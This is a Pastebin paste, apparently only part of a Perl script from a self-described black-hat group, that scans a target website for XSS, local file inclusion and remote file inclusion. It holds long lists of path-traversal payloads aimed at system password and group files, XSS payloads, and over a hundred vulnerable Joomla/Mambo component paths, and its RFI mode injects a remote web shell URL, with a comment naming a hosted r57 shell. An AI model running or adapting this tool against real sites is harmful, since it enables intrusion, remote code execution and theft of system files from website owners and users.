..%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....//etc/security/passwd","....//....//etc/security/passwd","....//....//....//etc/security/passwd","....//....//....//....//etc/security/passwd","....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//....//etc/security/passwd","....//etc/security/passwd%00","....//....//etc/security/passwd%00","....//....//....//etc/security/passwd%00","....//....//....//....//etc/security/passwd%00","....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00","/etc/security/group","../etc/security/group","../../etc/security/group","../../../etc/security/group","../../../../etc/security/group","../../../../../etc/security/group","../../../../../../etc/security/group","../../../../../../../etc/security/group","../../../../../../../../etc/security/group","../../../../../../../../../etc/security/group","../../../../../../../../../../etc/security/group","/etc/security/group%00","../etc/security/group%00","../../etc/security/group%00","../../../etc/security/group%00","../../../../etc/security/group%00","../../../../../etc/security/group%00","../../../../../../etc/security/group%00","../../../../../../../etc/security/group%00","../../../../../../../../etc/security/group%00","../../../../../../../../../etc/security/group%00","../../../../../../../../../../etc/security/group%00","%2Fetc%2Fsecurity%2Fgroup","..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","%2Fetc%2Fsecurity%2Fgroup%00","..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","%2F%2Fetc/security/group","....%2F%2Fetc/security/group","....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","%2F%2Fetc/security/group%00","....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","//etc/security/group","....//etc/security/group","....//....//etc/security/group","....//....//....//etc/security/group","....//....//....//....//etc/security/group","....//....//....//....//....//etc/security/group","....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//....//....//etc/security/group","//etc/security/group%00","....//etc/security/group%00","....//....//etc/security/group%00","....//....//....//etc/security/group%00","....//....//....//....//etc/security/group%00","....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//....//....//etc/security/group%00");
  34. ######
  35. @XSS = ("G3n3Rall",
  36. "<center>G3n3Rall</center>",
  37. "<center><marquee>G3n3Rall</marquee> </center>",
  38. "<CeNTer>G3n3Rall</CeNTer>",
  39. "='><script>alert(document.cookie)</script>",
  40. "&lt;script&gt;alert('G3n3Rall');&lt;/script&gt",
  41. "a?<script>alert('G3n3Rall')</script>",
  42. "<SCRIPT>a=/G3n3Rall/alert(a.source)</SCRIPT>",
  43. "%3Cscript%3Ealert('G3n3Rall')%3C/script%3E",
  44. "<SCRIPT>alert(String.fromCharCode(56,56,44,56,51,44,56,51))</SCRIPT>",
  45. "<IMG SRC=javascript:alert(String.fromCharCode(56,56,44,56,51,44,56,51))>",
  46. "<IMG SRC=javascript:alert('G3n3Rall')>",
  47. "<SCRIPT>a=/G3n3Rall/alert(a.source)</SCRIPT>",
  48. "<SCRIPT SRC=http://g3n3rall-blackhat.persiangig.com/XSS.JS?<B>");
  49.  
  50. ######
  51. @RFI = ("/components/com_flyspray/startdown.php?file=",
  52. "/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=",
  53. "/components/com_simpleboard/file_upload.php?sbp=",
  54. "/components/com_hashcash/server.php?mosConfig_absolute_path=",
  55. "/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=",
  56. "/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=",
  57. "/components/com_performs/performs.php?mosConfig_absolute_path=",
  58. "/components/com_forum/download.php?phpbb_root_path=",
  59. "/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=",
  60. "/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=",
  61. "/components/minibb/index.php?absolute_path=",
  62. "/components/com_smf/smf.php?mosConfig_absolute_path=",
  63. "/modules/mod_calendar.php?absolute_path=",
  64. "/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=",
  65. "/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=",
  66. "/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=",
  67. "/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=",
  68. "/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=",
  69. "/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=",
  70. "/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=",
  71. "/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=",
  72. "/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=",
  73. "/components/com_securityimages/configinsert.php?mosConfig_absolute_path=",
  74. "/components/com_securityimages/lang.php?mosConfig_absolute_path=",
  75. "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=",
  76. "/components/com_galleria/galleria.html.php?mosConfig_absolute_path=",
  77. "/akocomments.php?mosConfig_absolute_path=",
  78. "/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=",
  79. "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=",
  80. "/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=",
  81. "/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=",
  82. "/components/com_zoom/includes/database.php?mosConfig_absolute_path=",
  83. "/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=",
  84. "/components/com_fm/fm.install.php?lm_absolute_path=",
  85. "/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=",
  86. "/components/com_lmo/lmo.php?mosConfig_absolute_path=",
  87. "/administrator/components/com_webring/admin.webring.docs.php?component_dir=",
  88. "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=",
  89. "/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=",
  90. "/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=",
  91. "/components/com_mambowiki/MamboLogin.php?IP=",
  92. "/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=",
  93. "/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=",
  94. "/components/com_cpg/cpg.php?mosConfig_absolute_path=",
  95. "/components/com_moodle/moodle.php?mosConfig_absolute_path=",
  96. "/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=",
  97. "/components/com_mospray/scripts/admin.php?basedir=",
  98. "/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=",
  99. "/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=",
  100. "/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=",
  101. "/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=",
  102. "/components/com_madeira/img.php?url=",
  103. "/components/com_bsq_sitestats/external/rssfeed.php?baseDir=",
  104. "/com_bsq_sitestats/external/rssfeed.php?baseDir=",
  105. "/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=",
  106. "/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=",
  107. "/administrator/components/admin.jjgallery.php?mosConfig_absolute_path=",
  108. "/components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=",
  109. "/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=",
  110. "/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=",
  111. "/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=",
  112. "/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=",
  113. "/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=",
  114. "/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=",
  115. "/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=",
  116. "/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=",
  117. "/index.php?option=com_custompages&cpage=",
  118. "/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=",
  119. "/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=",
  120. "/components/com_facileforms/facileforms.frame.php?ff_compath=",
  121. "/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=",
  122. "/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=",
  123. "/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=",
  124. "/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=",
  125. "/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=",
  126. "/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=",
  127. "/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=",
  128. "/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=",
  129. "/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=",
  130. "/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=",
  131. "/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=",
  132. "/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=",
  133. "/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=",
  134. "/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=",
  135. "/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=",
  136. "/administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=",
  137. "/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=",
  138. "/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=",
  139. "/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=",
  140. "/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=",
  141. "/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=",
  142. "/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=",
  143. "/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=",
  144. "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=",
  145. "/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=",
  146. "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=",
  147. "/components/com_reporter/reporter.logic.php?mosConfig_absolute_path=",
  148. "/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=",
  149. "/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=",
  150. "/components/com_joomlaboard/file_upload.php?sbp=",
  151. "/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=",
  152. "/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=",
  153. "/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=",
  154. "/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=",
  155. "/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=",
  156. "/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=",
  157. "/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=",
  158. "/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=",
  159. "/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=",
  160. "/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=",
  161. "/modules/mod_as_category.php?mosConfig_absolute_path=",
  162. "/components/com_articles.php?absolute_path=",
  163. "/classes/html/com_articles.php?absolute_path=",
  164. "/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=",
  165. "/templates/be2004-2/index.php?mosConfig_absolute_path=",
  166. "/libraries/pcl/pcltar.php?g_pcltar_lib_dir=",
  167. "/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=",
  168. "/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=",
  169. "/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=",
  170. "/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=",
  171. "/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=",
  172. "/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=",
  173. "/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=",
  174. "/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=",
  175. "/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=",
  176. "/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=",
  177. "/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=",
  178. "/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=",
  179. "/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=",
  180. "/components/com_mp3_allopass/allopass.php?mosConfig_live_site=",
  181. "/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=",
  182. "/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=",
  183. "/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=",
  184. "/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=",
  185. "/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=",
  186. "/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=",
  187. "/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=",
  188. "/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=",
  189. "/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=",
  190. "/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=",
  191. "/administrator/components/com_color/admin.color.php?mosConfig_live_site=",
  192. "/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=",
  193. "/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=",
  194. "/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=",
  195. "/index.php?option=com_adsmanager&mosConfig_absolute_path=",
  196. "/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=",
  197. "/com_magazine_3_0_1/magazine.functions.php?config=",
  198. "/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=",
  199. "/administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=",
  200. "/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=");
  201.  
  202.  
  203. ##############################
  204. #XSS
  205.  
  206. if ($ID==1){
  207.  
  208. print "\n XSS:";
  209. print "\n\t\t Please Enter Target [http://www.site.com/search.php?id= ";
  210. print "\n\t\t Target:";
  211. $Target=<STDIN>;
  212. chomp ($Target);
  213.  
  214. foreach $XSS(@XSS){
  215. my $URL = $Target.$XSS;
  216. my $Source = get $URL;
  217. die "Can not get $URL" unless defined $URL;
  218. if ( $URL =~ /G3n3Rall/ || /HAcked/ || /BHG/ || /XSS/ || /cookie/  ) { $Message ="XSS Vulnerability FOUND";}
  219. else { $Message = "NOT FOUND XSS Vulnerability";}
  220. print "$URL     =>    $Message\n";
  221. print "\n \n \n \n \t \t \t \t FINISH ";
  222. open (TEXT, '>>XSS.txt');
  223. print TEXT "\n$URL   =>   $Message \n\n";
  224. close (TEXT);
  225. }
  226. goto Exit;
  227. }
  228. ###############################
  229. #LFI
  230. if ($ID==2){
  231.  
  232. print "\n\t\t Please Enter Target [http://www.site.com/search.php?id= ";
  233. print "\n\t\t Target:";
  234. $Target=<STDIN>;
  235. chomp ($Target);
  236.  
  237.  
  238. foreach $LFI(@LFI){
  239. my $URL = $Target.$LFI;
  240. my $Source = get $URL;
  241. die "Can not get $URL" unless defined $URL;
  242. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
  243. else { $Message = "NOT FOUND LFI Vulnerability";}
  244. print "$URL     =>    $Message\n";
  245. print "\n \n \n \n \t \t \t \t FINISH ";
  246. open (TEXT, '>>LFI.txt');
  247. print TEXT "\n$URL   =>   $Message \n\n";
  248. close (TEXT);
  249. }
  250.  
  251. }
  252. #################################
  253. if ($ID==3){
  254.  
  255. print "\t\tPlease Enter Target [http://www.site.com]";
  256. print "\n\n \t Target:";
  257. $Target=<STDIN>;
  258. chomp ($Target);
  259. print "\n\t\t  please Enter Shell Link:";  #May Can help you : http://www.mcrracecars.co.uk/images/r57.txt
  260. $Shell =<STDIN>;
  261. chomp ($Shell);
  262. print"\n\n \t\t Please wait";
  263. sleep(2);
  264. print"\n";
  265.  
  266. foreach $RFI(@RFI){
  267. my $URL =$Target.$RFI.$Shell;
  268. my $Source = get $URL;
  269. die "Can not get $URL" unless defined $URL;
  270. if ($Source =~ /r57shell/ || /safe_mode/ || /Executed / || /Shell/){ $Message ="RFI Vulnerability FOUND";}
  271. else { $Message = "NOT FOUND RFI Vulnerability";}
  272. print "\n \n \n \n \t \t \t \t FINISH ";
  273. print "\n $URL  =>   $Message \n";
  274. open (TEXT, '>>RFI.txt');
  275. print TEXT "\n $URL   =>   $Message \n\n";
  276. close (TEXT);
  277.  
  278. }
  279.  
  280. }
  281. #################################
  282. #XSS & LFI
  283. if ($ID==4){
  284.  
  285. print "\t\tPlease Enter Target [http://www.site.com]";
  286. print "\n\n \t Target:";
  287. $Target=<STDIN>;
  288. chomp ($Target);
  289. print "\n\t\t  please Enter Shell Link:";  #May Can help you : http://www.mcrracecars.co.uk/images/r57.txt
  290. $Shell =<STDIN>;
  291. chomp ($Shell);
  292. print"\n\n \t\t Please wait";
  293. sleep(2);
  294. print"\n";
  295.  
  296.  
  297. foreach $XSS(@XSS){
  298. my $URL = $Target.$XSS;
  299. my $Source = get $URL;
  300. die "Can not get $URL" unless defined $URL;
  301. if ( $URL =~ /G3n3Rall/ || /HAcked/ || /BHG/ || /XSS/ || /cookie/  ) { $Message ="XSS Vulnerability FOUND";}
  302. else { $Message = "NOT FOUND XSS Vulnerability";}
  303. print "$URL     =>    $Message\n";
  304. print "\n \n \n \n \t \t \t \t FINISH ";
  305. open (TEXT, '>>ALL.txt');
  306. print TEXT "\n$URL   =>   $Message \n\n";
  307. close (TEXT);
  308. }
  309.  
  310. foreach $LFI(@LFI){
  311. my $URL = $Target.$LFI;
  312. my $Source = get $URL;
  313. die "Can not get $URL" unless defined $URL;
  314. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
  315. else { $Message = "NOT FOUND LFI Vulnerability";}
  316. print "$URL     =>    $Message\n";
  317. print "\n \n \n \n \t \t \t \t FINISH ";
  318. open (TEXT, '>>ALL.txt');
  319. print TEXT "\n$URL   =>   $Message \n\n";
  320. close (TEXT);
  321. }
  322. }
  323. ##############################
  324. #Exit
  325. if ($ID==5) {exit;}
  326. Exit:
  327. exit;
  328. system("pause");
  329.  
  330.  
  331.  
  332.  
  333.  
  334. Black Hat group Security Center
  335. Site: www.Black-hg.org
  336. Forum: www.Black-hg.org/cc/
  337. By G3n3Rall
  338. AnTi.SecurityBoy@Gmail.com
  339.  
  340. Bye.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!